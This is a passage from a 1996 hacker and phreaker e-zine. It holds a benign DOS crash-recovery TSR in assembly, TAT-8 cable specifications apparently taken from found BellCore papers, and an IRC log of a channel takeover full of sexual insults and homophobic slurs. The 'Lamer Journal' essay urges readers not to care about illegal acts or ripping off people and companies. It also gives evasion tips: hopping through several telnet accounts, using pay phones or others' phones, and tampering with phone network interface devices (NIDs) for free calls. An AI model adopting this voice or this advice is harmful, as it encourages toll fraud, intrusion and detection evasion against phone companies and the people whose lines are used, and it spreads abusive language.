DUP(?) ; PICK UP INT VECTS BLOCK_ADDR DW ? ; NEXT SEGMENT BLOCK_SIZE DW ? ; SEGMENT SIZE OK$ DB BEL, 'TnG Corp: ' DB 'memmory state restored (if possible).$' ;******************************************************************************* ; KBD_INT - NEW KEYBOARD INTERRUPT ;******************************************************************************* KBD_INT PROC FAR PUSH AX DS ; PICK UP ALT. REGISTERS MOV AX, 40h ; PREPARE TO BIOS DATA AREA MOV DS, AX MOV AL, BYTE PTR DS:[SHIFT_STATUS] AND AL, 0Fh CMP AL, ALT_CTRL_MASK JNE BAD_KEY IN AL, 60h ; SCAN CODE KEY CHECK CMP AL, BKS_SCAN_CODE JNE BAD_KEY IN AL, 61h ; KEYBOARD READ SIGNAL MOV AH, AL OR AL, 80h OUT 61h, AL XCHG AH, AL OUT 61h, AL MOV AL, 20h ; END OF INTERRUPT SIGNAL OUT 20h, AL PUSH CS POP DS MOV ES, BLOCK_ADDR ; CREATE LAST MCB CLD XOR DI, DI MOV AL, 'Z' STOSB XOR AX, AX STOSW MOV AX, BLOCK_SIZE STOSW XOR AX, AX ; RESTORE INTERRUPT VECTORS MOV ES, AX MOV SI, OFFSET VEC_TAB XOR DI, DI MOV CX, LAST_VECT * 2 CLI REP MOVSW STI MOV BX, CS ; ACTIVATE PSP MOV AH, 50h INT 21h MOV AX, 40h ; CHANGE VIDEO MODE TO 80x25 TEXT MOV ES, AX MOV AL, 7 ; VIDEO MODE 7 - HGC, MDA CMP ES:[CRT_ADDR], 3B4h JE SET_MODE MOV AL, 3 ; VIDEO MODE 3 - CGA, EGA, VGA SET_MODE: XOR AH, AH INT 10h MOV DX, OFFSET OK$ ; DESINSTALATION MOV AH, 9 INT 21h MOV AX, 4C00h ; ABORT TO OPERATIVE SYSTEM INT 21h BAD_KEY: POP DS AX ; JUMP TO OLD INT 9 DB JMP_FAR OLD_KBD DD 0 KBD_INT ENDP END_TSR EQU $ ;******************************************************************************* ; NON RESIDENT VARIABLES ;******************************************************************************* COPYRIGHT$ DB ' Boot 1.0 - by: |\|\cFiLL @ TnG Corp. 1996.$' INSTALL_OK$ DB CR, LF, 'ALT+CTRL+BACKSPACE, to make a boot.' DB CR, LF, 'NOTE: ' DB 'just use on system CRASH state.$' LH_ERR$ DB BEL, CR, LF, 'ERROR: ' DB 'do not load on high memmory.$' ;******************************************************************************* ; MAIN - PRINCIPAL SOFT ;******************************************************************************* MAIN: MOV DX, OFFSET COPYRIGHT$ ; WHO AM I MOV AH, 9 INT 21h MOV AX, CS ; CHECK HIGH MEMMORY CMP AX, 0A000h ; LOAD JB LOW_MEM MOV DX, OFFSET LH_ERR$ ; ERROR MOV AH, 9 INT 21h MOV AX, 4CFFh ; END OF SOFT INT 21h LOW_MEM: MOV DX, OFFSET INSTALL_OK$ ; INSTALATION MOV AH, 9 INT 21h XOR AX, AX ; INTERRUPTS TABLE COPY MOV DS, AX MOV CX, LAST_VECT * 2 MOV SI, AX MOV DI, OFFSET VEC_TAB CLD REP MOVSW PUSH CS ; RESTORE DS POP DS MOV ES, DS:[2Ch] ; LEAVE ENVIRONMENT BLOCK MOV AH, 49h INT 21h MOV AX, 3509h ; REDICIONATE INT 9 INT 21h MOV WORD PTR OLD_KBD, BX MOV WORD PTR OLD_KBD+2, ES MOV AX, 2509h MOV DX, OFFSET KBD_INT INT 21h PUSH CS ; CALCULATE SOFT SIZE POP ES MOV BX, (OFFSET END_TSR - CSEG + 15) SHR 4 MOV DX, BX MOV AX, CS ADD AX, BX MOV BLOCK_ADDR, AX MOV AH, 4Ah ; CHANGE MCB SIZE INT 21h MOV BX, -1 ; DISP. MEMMORY MOV AH, 48h INT 21h MOV BLOCK_SIZE, BX MOV AX, 3100h ; GET OUT TO S.O. AND STAY RESIDENT INT 21h CSEG ENDS END START ============================================================================= the Transatlantic Telephone Cable #8 (TAT-8) info by Keystroke One night while I was out doing stuff (heh) and I found these BellCore document just lying around! It turns out they were on the Transatlantic Telephone Cable #8. aka TAT-8. Here's what they said: IN SERVICE: SINCE 1988 LOCATION: TUCKERTON, NJ TO WIDEMOUTH, ENGLAND TO PENMARCH, FRANCE UNDERSEA PATH LENGTH: 5600km +500km ENGLAND }\ [It branches off in two directions, as you can see in int picture] +300km FRANCE }/ WAVELENGTH: 1.3um FIBER: MONOMODE DEPRESSED CLADDING FIBERS IN A CABLE 1.6 AMPERE CONDUCTOR FOR REPEATER POWER LIGHT SOURCE: DOUBLE HETEROSTRUCTURE LASER DIODES MEDIAN LIFETIME = 10^6 HOURS CAPACITY: 557 Mbps + 2 FIBER PAIRS OPERATING AT 295.6 Mbps + 2 STANDBY FIBERS + 40,000 VOICE CHANNELS (USING ADAPTIVE DELTA PULSE CODED MODULATION) + ELECTRONIC MULTIPLEXERS AND DEMULTIPLEXERS CONVERT BETWEEN THE 295.6 Mbps LINES AND THE EUROPEAN 139.264 Mps LINES TRANSMITTER: LASER DIODE InGaAsP (1290-1330nm) OUTPUT POWER > 5mW AT 30mA RECEIVER: InGaAs PIN DIODE REPEATERS: INTER-REPEATER DISTANCE =[about] 35km-50km, 103 REPEATERS 6 REGENERATORS IN EACH REPEATER, (2 IN ONE DIRECTION, 2 IN THE OTHER DIRECTION, 2 STANDBY) PARTNERS IN THE TAT-8 PROJECT 34.10% AT&T 27.00% FOREIGN INVESTORS 15.50% BRITISH TELECOM 13.60% MISCELANEOUS INVESTORS 9.80% FRANCE 100.00% HAVOC (: ============================================================================= For your reading pleasure... the take over of #e.p.a.! E.P.A. (Elite Phreakers Alliance) were a group of lamers that invited is to their channel, and as you can see the boys of #phreak made them regret they ever invited us.. enjoy! NOTE: this is also online: www.geocities.com/SiliconValley/8805/e_p_a.log Session Start: Wed Dec 04 01:17:09 1996 *** Now talking in #e.p.a. whats up heheh hey el4n not much hi Scud-O hey welcome hi scud *** memor (~derzeter@ has joined #e.p.a. so tell us about epa hey memor *** ec|ipse (eclypse@kam-as-01b06.direct.ca) has joined #e.p.a. w3rd i did it what if somone.. how should i say.. was not "eleet" wanted to join up.. could they still do this? tell us bout epa i mean get in epa an all? do you guys get lots of chicks? i thank elite was on bbs only.. EPA is just basically a bunch of guys from canada k hehe chicks *** YourMom (jlmason@pm028-06.dialip.mich.net) invites you to join #teenhackers lots o chicks *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers *** YourMom (jlmason@pm028-06.dialip.mich.n et) invites you to join #teenhackers yes i will join epa if you gets lots of chicks YES YES YES i am from canada let's get some chicks! i am a canuck... moved to us.. but moving back HOLY SHIT THERES MORE PEOPLE THEN THEN LIKE ANYWERHE!@$ #TEENHACKERS hey baby.. im in epa... want to go fuck? IS THE PLACE me from canada well if ^cna^ is from epa, i'll join heh HEHE teen hacers chicks!! what about teen hacker chicks? * (__) * /oo\\________ * \\ / \\ * \\/ / \\ * \\_|___\\_|/.\\ * || YY| o ' * || || O * ^^ ^^ type ~beast el4n *** Drooke (wassupfoo@stjhts15c43.nbnet.nb.ca) has joined #E.P.A. *** Drooke changes topic to "Elite Phreakers Assotiation" *** Draim_K has quit IRC (Read error to Draim_K[stjhts15c43.nbnet.nb.ca]: Connection reset by peer) ~BEAST el4n has been feeling desperate lately... el4n notices a lovely cow grazing out in a field... el4n can't hold it any longer and runs out into the field and fucks the cow. ��M���� T��� ~�� *** Drooke is now known as Draim_K if u want me eleet ass in epa, i better be getting awps let me in to epa!!!!!!!!!!!!! i know redbox teknique *** DrubleR (~Hey.who.n@btstts01c12.nbnet.nb.ca) has joined #E.P.A. ok *** Sanctity sets mode: +o DrubleR * Sanctity hands DrubleR some of dat stuff!!! well, awp me heh heh hey sanc op *** Keystroke (��Z�)�(~y@ppp-21.ts-1.mvl.idt.net) has joined #e.p.a. anybody know why my redbox dosent work? *** Sanctity sets mode: +o ec|ipse * Sanctity hands ec|ipse some of dat stuff!!! KEYz op i need to be oped also brb *** Sanctity sets mode: +o el4n * Sanctity hands el4n some of dat stuff!!! op me *** el4n sets mode: -o DrubleR *** el4n sets mode: -o Sanctity oooooops db.. :) * Sanctity takes out his Shotgun and tells Draim_K you got 10 seconds to run * Sanctity Draim_K 10 * Sanctity Draim_K 1 * Sanctity pulls out the shotgun and blows Draim_K 's head off.. *** el4n sets mode: +o Scud-O hehe thbjma sel * Sanctity shows Draim_K a broomstick and some KY........ Suddenly some cheap 70's porno film music comes on [BOOMP-CHICKA-BOOMP-BOWWWWW!] Draim_K decides he'd prefer not to take chances and runs like fuck...... *** ec|ipse sets mode: +m *** el4n sets mode: +o memor heh.. *** el4n sets mode: +o Keystroke than you el hehehehehehehe ah.. db wont change hehe hey KEY!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!! w3rd el4n! *** Keystroke changes topic to "The so called e.p.a. should be the g.f.a. for gay fags accociation. You (the one op) sucks a nut! I own your lame asses" hehe im not the president of EPA Yea you the man! heheheh EPA was bought out oops terrable takeoveer * Keystroke didnt know he had ops damn key rules.. he always has ops *** Draim_K (wassupfoo@stjhts15c43.nbnet.nb.ca) has left #E.P.A. *** Keystroke changes topic to "#phreak owns ewe" takeovers rule... *** Keystroke sets mode: +nt -memor:#e.p.a.- Scud-O takes rule... And Eats His Brain. hehe so now we are in epa right? #2600 and #hackers and #phreak and #hackerz were all mine one night :) memor: ? *** el4n changes topic to "EPA = Educated Pastrey Associates" yea? *** el4n changes topic to "EPA = Educated Provalactic Associates" what do you mean and eats his brian? ha heh my events *** el4n changes topic to "EPA = Endured Provalactic Associates" heheh im in epa!!! *** el4n changes topic to "EPA = Endured Provalactic Association" *** Keystroke changes topic to "EPA = Eat Penis and Ass" Enviroenmental PRotction agency well => take*:#: $nick takes $1 $+ $2 $+ $3 and hits his brain Evironmental Protection Agency yes we needed a name change the old one was just to flamboyend *** arg (~sergio@ppp-24.ibw.com.ni) has joined #E.P.A. hehehe okay flamboyent your weird memor fuck i gotta learn to type I like that in a phreaker *** arg (~sergio@ppp-24.ibw.com.ni) has left #E.P.A. iam yea heh.. Scud - have you just been having alot of sex or what?? i havent seen you in ages hehe *** el4n sets mode: -m ok now what do youall have to say for yerselfs? el: yes.. 34-54 times a day! holy gawd no wonder you have no time for fcompouter FUCK LEARN TO TYPE *** Keystroke has quit IRC (Excess Flood) me that is. el: sorry... I dont fuckinh want to type... I speach itialian damn it I cant spell either.. heheheh type ~beast my friend hasn't seen them actually im getting a bj right now.. so its hard to type! ~beast el4n has been feeling desperate lately... el4n notices a lovely cow grazing out in a field... el4n can't hold it any longer and runs out into the field and fucks the cow. ~breast ~kittylitter i see.. type ~rlu *** Keystok (bozo@ppp-21.ts-1.mvl.idt.net) has joined #e.p.a. *** ec|ipse sets mode: +o Keystok ~rlu el4n takes a crowbar and breaks into an RLU and starts ripping it apart... way ta go, el4n ! I scroolled it 10000000000 times #gaysex hehe Thanks what did you skrewl? skkroll *** Now talking in #gaysex i want it up the ass do you screw off? #EPA not e.p.a. hehe Ask what keystroke did They will cry *** Digital_X (user@raptor.top.monad.net) has joined #e.p.a. :) *** Digital_X (user@raptor.top.monad.net) has left #e.p.a. heleo X! this channel is gross yea.. it sucks die die die die *** memor has quit IRC (Read error to memor[194.20 6.81.193]: Connection reset by peer) /msg el4n ok, i'll have gay sex with you :) ooops haha scud- o : anyone msg ya? i want it now... *** ec|ipse has quit IRC (Excess Flood) msg me.. nope.. dontta thinka so *** ec|ipse (~eclypse@kam-as-01b06.direct.ca) has joined #e.p.a. right now?? *** el4n sets mode: +o ec|ipse *** memor (~derzeter@ppp1.planetb.fr) has joined #e.p.a. *** Scud-O sets mode: +o memor Error: WSAENOTSOCK (4) by TCPMAN conf info CYA CYA CYA no dpont go CYA no *** Keystok (bozo@ppp-21.ts-1.mvl.idt.net) has left #e.p.a. *** Defraz (~just@ has joined #E.P.A. * Sanctity shows el4n a broomstick and some KY........ Suddenly some cheap 70's porno film music comes on [BOOMP-CHICKA-BOOMP-BOWWWWW!] el4n decides he'd prefer not to take chances and runs like fuck...... h3h3h3 funny stuff san hehe yeah, my friend wrote this prog it rocks *** Vakant (Drub@btstts01c12.nbnet.nb.ca) has joined #e.p.a. ello we own this channel.. you must hail us all! prog? hehehehehehehehehehe you call that a prog? *** had (~jjh@pm8-13.enter.net) has joined #E.P.A. i think i m going to add some shit to my popups.ini n call it a program yeh.. were the EPA BOW DOWN *** had (~jjh@pm8-13.enter.net) has left #E.P.A. yea bow now damn it.. or be killed!!!!!!! !!!!! ehehehehehehehehehheheheheheheheheheheheh ehehe * Sanctity grabs Scud-O by the neck and hooks Scud-O's upper jaw over his thumb.. * Sanctity takes careful aim while stretching Scud-O wayyy out..... * Sanctity releases Scud-O..... *twang* i think that i will have to take off the pants and belt in a second dont piss me off *** Draim_K (wassupfoo@stjhts15c43.nbnet.nb.ca) has joined #e.p.a. sanctuty - tell your friends that hes a homo will ya :) *** Podunk (zero@ppp39.respool1.medina.ohio.net) has joined #E.P.A. *** MuD-SeRV (wassupfoo@stjhts15c43.nbnet.nb.ca) has joined #e.p.a. ewww... that would hurt *** MuD-SeRV is now known as Ere heheh im gunna piss all over you ahahahahahahahha Im mad.. mda is say! get your spite in a bag get your bile pilled up... its thje best damn vengance youve ever had! -Scud The Dispossible Assassin! i cant type for shit can it folks? Session Close: Wed Dec 04 01:45:10 1996 ============================================================================= RTFM: The Lamer Journal Street Smarts I found this in the Empire Times and well.. I want you to read it. Armitage says some very true things... From the Empire Times issue 7 I've read alot in recent magazines and have seen alot on tv recently about hackers, and it makes me sick. I don't think the perceptions are accurate. Even though it bothers me, being the laid back individual I am I don't let it get to me. Maybe that is my fault, maybe it is good though. I want to send out a message to all the covert hackers and phreakers. Not many people have such talents that some of us have. Use them wisely, and think about what you are doing before you do it. I am not saying hacking is bad (no no, why would anyone think that?). I am just saying that think about what you are doing and how you can get caught. I don't want people to get locked up like Mitnick and others. Watch yourselves. I'm going to keep it short and sweet. This is definatly a period of busts. Many many fellow hackers have gone 'down'. That is something that most people consider the worst thing that could ever happen to a member of the computer underground. Till the next Empire Times, armitage@dhp.com +-----------------------------------------------------------+ Armitage speaks the truth. We are in a period of heavy busts. You probably will not have all the time you need to learn before you get busted. If you cant handle this then stop reading this file and destroy all of the hacking/phreaking files you may have found. If you are worried of being busted, you have failed. If you worry about being busted, you are not a hacker or phreaker. If you worry about being busted, you will be busted. Still here? Good. Congradulations! You have taken the first step towards becoming a h/p person. You mut not fear or care! You must not fear doing illegal things, and you must not care about ripping people or companies off. If you do, you will get busted my friend. Second, don't ask for help with EVERY little detail. Most people with some practice in H/P will not help you. They may help out a little, but the rest you must find out for yourself. That is what hacking and phreaking is. It is Exploring. Not ripping people off or doing illegal things, it is the exploring of systems for KNOWLEDGE! You MUST know this. If you think Hacking or phreaking is just about having fun, i'm calling the cops right now. Sure it is fun, but it takes alot of work. Don't expect to be spoon fed everything. Sure the first stuff is pre-canned for you, but the further you go into things the more you will have to learn by your own mistakes. Third, Be VERY (emphasis on VERY) careful with who you share info with most people on IRC do NOT know what they are talking about and so, they will only mess things up for you. You must be VERY careful with what you say to people. I am a very open person online, and one day this will hurt me. I will get busted probably for trusting the wrong person. Don't make that mistake. Fourth, COVER YOUR TRACKS!! This is VERY imortante! when you are messing around with a shell script or program, telnet thru several different accounts first. In issue 4 at the end I published a list of freenets to use. So get issue 4 and use those accounts. Also, NEVER call numbers from your house unless you want to be busted! Use a pay phone or someone elses phone. I published an article in issue 4 which clearly tells you how to mess with NIDs to make free phone calls. Just going around your neighborhood should turn up a few NIDs to play with. I dont want to sound like i'm condemning you to death or anything, it is just that it is much harder to stay around in the "underground" these days. Safe Hacking & Phreaking- Scud-O FoxMulder@worldnet.att.net +---------------------------------------------------------+ NOTE: if you use a lame nationwide ISP like AOL, P*, Netcom or MSN. Go and cancel your account NOW! Get a local ISP or use AT&T or earthlink. They need the money and almost all local ISPs have shell accounts so you can use scripts! Or if you only get a SLIP/PPP acount, l0pht and many other places have shell accounts at low prices you can telnet in to! Next Month on RTFM: Basics on hacking 2 Month From Now: Basics on phreaking ============================================================================= ROLL CALL & More! Who is HAVOC Bell Systems? Scud-O : Linux Lammah Psycho : All Around Lammah |\|\cFill : Mad Genius (doing wonders for tNg mIRC v.2.0!) Keystroke : Mad PLA Insider Sancho Panza : This boy is so lame he couldn't hack is way out of a bag! hehehehehe (no wonder he's not in HBS) The MIA people have been taken off the list! Cool Undernet Channels: #phreak #rewt Cool People: UnaBomber (if he's ever on anymore!) theLURK3R (aka `X`) demonweed darkcyde (if he's ever on anymore!) Rap3d_C0w luthor CiND3R RedTyde (aka ^ReDMaN^) RedDeath el4n LuCiFeR_ X-SeRiAl yesimlame fusi0n KungFuFox ArcAngel darcangel BC219 XiN0 (hehehehehehe.. bwahahahahahahahahahahaha) all of these fine gents can be found on #phreak (Who will i add to HBS? find out next month!) Lamah of the Month: kradd00d - kradd00d@juno.com This Month Question(s): Why did it take you SO long to put out the issue? Well first NO ONE turned in thier articles! (the little punks) Anyway, I had all my stuff done and on the 15th when this issue was first going to come out, |\|\cFill send me his article. Psycho is such a lamer that i had to write his article for him the lame @$$ bitch! And well Keystroked HD exploded after installing linux (which im going to be doing soon) and so it took him until today (12/26/96) to send it out to me. -Oh Well- (sign) Next Month's Question: Who are |\|\cFill and Keystroke and Psycho? Next Month: This MAY be what we will have in issue 7 - Pagers - Cell Phones - A shit load of good UNIX C code stolen from theLURK3R! - The Practical Mailbomber for every day use - More from the RTFM: The Lamer Journal - Much, Much more TBA! Issue 7 is out Jan. 31st! cya ya next issue! - The HAVOC Technical Journal Crew ============================================================ = IS this copy of The HAVOC Technical Journal Skunked? = If this file reads larger than 70177 bytes than this issue = has been messed with! get a fresh copy from our site: = www.geocities.com/SiliconValley/8805/ ============================================================